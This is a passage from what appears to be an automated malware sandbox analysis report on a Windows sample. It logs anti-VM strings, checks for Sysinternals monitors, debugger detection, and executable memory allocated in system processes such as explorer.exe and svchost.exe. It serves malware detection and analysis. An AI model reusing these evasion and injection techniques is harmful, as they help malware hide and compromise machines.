        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6024; Thread sleep time: -1480000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7936; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 1952; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 3600; Thread sleep count: 108 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 3600; Thread sleep time: -1080000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7968; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7976; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6048; Thread sleep count: 107 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6048; Thread sleep time: -1070000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 3000; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6320; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6232; Thread sleep count: 82 > 30
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 6232; Thread sleep time: -820000s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 7980; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe TID: 5232; Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\SysWOW64\PING.EXE; Last function: Thread delayed
        Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Last function: Thread delayed
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Last function: Thread delayed
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_01441060 Sleep,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,Sleep,lstrlen,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,lstrcpy,lstrcat,DeleteFileA,lstrcpy,lstrlen,lstrcmpiA,FindClose,Sleep
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_0143A2F5 Sleep,GetTempPathA,lstrlen,lstrcat,lstrlen,lstrcpy,lstrcat,FindFirstFileA,FindNextFileA,lstrcat,lstrlen,lstrlen,lstrcmpiA,lstrcmpiA,Sleep,FindClose,Sleep,RtlExitUserThread
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Code function: 18_2_004028ED memset,CreateToolhelp32Snapshot,Process32FirstW,GetSystemInfo,ReadProcessMemory,Process32NextW,Sleep
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 120000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 180000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 300000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 62505
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 120000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 360000
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread delayed: delay time: 1800000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 62965
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 300000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 180000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 120000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 360000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 1800000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 600000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 900000
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread delayed: delay time: 1800000
        Source: jvauyc32.exe, 00000018.00000002.2160603432.00000000015B8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
        Source: dwm.exe, 00000006.00000000.1584724657.00000283DDE43000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&0000007R
        Source: explorer.exe, 00000017.00000000.1811548975.000000000888E000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}=
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1697379207.000000000087E000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW`X
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008796000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWe
        Source: SecuriteInfo.com.Win32.Sector.30.15961.3704.exe, 00000001.00000002.1715429645.0000000005F9F000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.0000000001381000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1811548975.0000000008685000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
        Source: SearchApp.exe, 0000001E.00000000.2062712948.000001D61AF87000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: s://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: SearchApp.exe, 0000001E.00000000.2093276203.000001D61C5A7000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
        Source: svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;False]
        Source: svchost.exe, 00000014.00000000.1740893226.000001697A687000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.4040879149.000001697A687000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
        Source: SearchApp.exe, 0000001E.00000000.2061430410.000001D61ACD5000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000001E.00000000.2526387383.000001D630D8C000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: var fbpkgiid = fbpkgiid || {}; fbpkgiid.page = '';;(function(BingAtWork) { if (typeof (bfbWsbTel) !== "undefined") { BingAtWork.WsbWebTelemetry.init({"cfg":{"e":true,"env":"PROD","t":"33d70a864599496b982a39f036f71122-2064703e-3a9d-4d90-8362-eec08dffe8e8-7176"},"ig":"829FCEE88A524F41943F335B832D1A47","ConversationId":"d0438cf5-4bd5-480a-aeab-06785994a74c","LogicalId":"1f8c91c6-235c-4050-8639-720df71e4e93","tid":"651e7d8414ca4632956d0384c6530119","sid":"2E8B8FD9DBFE6CCB3A6B9C78DAFA6D14","uid":"","muid":"531305E83CE64DE088676FE94B9682C4","puid":null,"isMtr":false,"tn":null,"tnid":null,"msa":false,"mkt":"en-us","b":"edge","eref":"Ref A: 651e7d8414ca4632956d0384c6530119 Ref B: MWHEEEAP0024F6E Ref C: 2023-10-05T09:10:28Z","vs":{"BAW10":"BFBLCLAZY","BAW11":"MSBSSVLM","BAW5":"MSBCUSTVERT","BAW7":"BFBPROWSBINITCF","BAW9":"BCETONCF","CLIENT":"WINDOWS","COLUMN":"SINGLE","FEATURE.BFBCREFINER":"1","FEATURE.BFBEDUQWQSCLKWSB":"1","FEATURE.BFBLCLAZY":"1","FEATURE.BFBMSBGHF":"1","FEATURE.BFBPROWSBINITCF":"1","FEATURE.BFBSPCUSTVERT":"1","FEATURE.BFBSSFTOOB":"1","FEATURE.BFBSSVLM":"1","FEATURE.BFBWSBGHF928T":"1","FEATURE.BFBWSBRS0830TF":"1","FEATURE.MSBCUSTVERT":"1","FEATURE.MSBSSVLM":"1","FEATURE.MSNSBT1":"1","FEATURE.WSBREF-C":"1","MKT":"EN-US","MS":"0","NEWHEADER":"1","THEME":"THBRAND","UILANG":"EN"},"dev":"DESKTOP","os":"WINDOWS","osver":"11","dc":"CoreUX-Prod-MWHE01","canvas":"","sci":true,"isMidgardEnabled":true,"isHomepage":false,"snrVersion":"2023.10.04.39971431"}); } })(BingAtWork || (BingAtWork = {}));;_w.rms.js({'A:rms:answers:BoxModel:Framework':'https:\/\/r.bing.com\/rb\/18\/jnc,nj\/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w'});;
        Source: explorer.exe, 00000017.00000000.1811548975.0000000008979000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: VMware SATA CD00`
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087C0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: NXTVMWare
        Source: jvauyc32.exe, 00000012.00000003.2450849166.0000000003418000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.3635004664.0000000003178000.00000004.00001000.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
        Source: svchost.exe, 00000014.00000000.1740927519.000001697A6A9000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: @os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: explorer.exe, 00000017.00000002.4022108961.0000000000A44000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
        Source: explorer.exe, 00000017.00000000.1811548975.00000000087C0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
        Source: jvauyc32.exe, 00000012.00000002.4048026026.00000000016A8000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllI
        Source: svchost.exe, 00000014.00000002.4039173983.000001697A665000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: $@os=windows; osVer=10.0.19045.2006; lcid=en-GB; deviceType=9; deviceModel=VMware, Inc./VMware20,1;
        Source: jvauyc32.exe, 0000000A.00000003.2009490304.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2460098695.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.1816216518.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2331666794.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2938885386.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2847114789.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.3254569338.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2769552015.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2524944921.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.0000000001456000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000003.2407819962.0000000001456000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAWL
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
        Source: explorer.exe, 00000017.00000002.4022108961.0000000000A44000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
        Source: explorer.exe, 00000017.00000003.3085615252.00000000088E6000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
        Source: RuntimeBroker.exe, 0000001D.00000002.4032498808.0000023D71851000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; System information queried: ModuleInformation
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process information queried: ProcessInformation

        Anti Debugging

        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_00AB130D CheckRemoteDebuggerPresent,Sleep,EnumWindows,Sleep
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Thread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Thread information set: HideFromDebugger
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Open window title or class name: regmonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Open window title or class name: process monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Open window title or class name: procmon_window_class
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Open window title or class name: filemonclass
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Open window title or class name: file monitor - sysinternals: www.sysinternals.com
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process queried: DebugPort
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process queried: DebugObjectHandle
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process queried: DebugPort
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugObjectHandle
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugObjectHandle
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process queried: DebugPort
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Code function: 18_2_00401363 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_01443B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_00AB14BA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Code function: 10_2_009714BA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Code function: 18_2_00403B87 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Code function: 18_2_00403BBC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Code function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process token adjusted: Debug
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process token adjusted: Debug
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe; Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process token adjusted: Debug
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe; Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: F10000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 190000 protect: page execute and read and write
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 660000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: F20000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\fontdrvhost.exe base: 1A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\dwm.exe base: 670000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\sihost.exe base: D20000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 3F0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 8D0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\ctfmon.exe base: 7F0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\explorer.exe base: B60000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 2E0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe base: A30000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 620000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe base: 160000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: A80000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 980000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\smartscreen.exe base: 890000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: F70000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe base: 1A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 9A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe base: AA0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\svchost.exe base: 210000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Windows\System32\conhost.exe base: 90000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7B0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7C0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12B0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12C0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 790000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 7A0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A20000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: A30000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AD0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: AE0000 protect: page execute and read and write
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe | Memory allocated: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: B90000 protect: page execute and read and write
